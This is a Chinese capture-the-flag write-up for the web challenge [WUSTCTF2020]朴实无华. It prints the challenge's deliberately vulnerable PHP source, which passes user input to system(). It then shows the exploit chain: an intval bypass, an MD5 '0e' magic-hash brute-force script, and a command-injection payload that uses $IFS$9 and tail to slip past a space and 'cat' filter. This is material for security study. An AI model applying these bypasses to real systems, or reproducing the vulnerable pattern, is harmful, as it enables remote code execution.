其他分享
首页 > 其他分享> > [WUSTCTF2020]朴实无华

[WUSTCTF2020]朴实无华

作者:互联网

[WUSTCTF2020]朴实无华

考点:1.MD5碰撞 2.命令执行绕过

打开题发现编码有些问题,修改编码为utf-8

image

看了源码和请求包没发现什么东西,看到title想到了robots.txt文件,打开看一看

image

额,打开后发现

image

在观察观察看到了这个

image

终于找到源代码了!!!开心vヾ(≧▽≦*)o

php源码如下:

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

先是绕过2个if就可以成功进行RCE了

Levle 1

if(intval($num) < 2020 && intval($num + 1) > 2021)

payload

num = 2019e1

本地测试一下就知道原因啦

<?php
$num = $_GET['num'];
var_dump($num);
echo '<br>';
echo intval($num);
echo '<br>';
var_dump($num + 1);
echo '<br>';
echo intval($num + 1);
?>

image

Level 2

$md5==md5($md5)
import hashlib

payload = 0
while True:
    md5 = hashlib.md5(f'0e{payload}'.encode('ascii')).hexdigest()
    if md5[:2] == '0e':
        if md5[2:].isdigit():
            print(f'0e{payload}  {md5}')
            break
    payload += 1

image

RCE

  1. 空格使用$IFS$9
  2. cat可以换做用more,tail等其他方法
http://91e9c6f4-17af-46f9-b641-d91522c24f26.node3.buuoj.cn/fl4g.php?num=2019e1&md5=0e215962017&get_flag=tail$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

image

标签:WUSTCTF2020,get,echo,flag,num,朴实无华,payload,md5
来源: https://www.cnblogs.com/seizer/p/14886721.html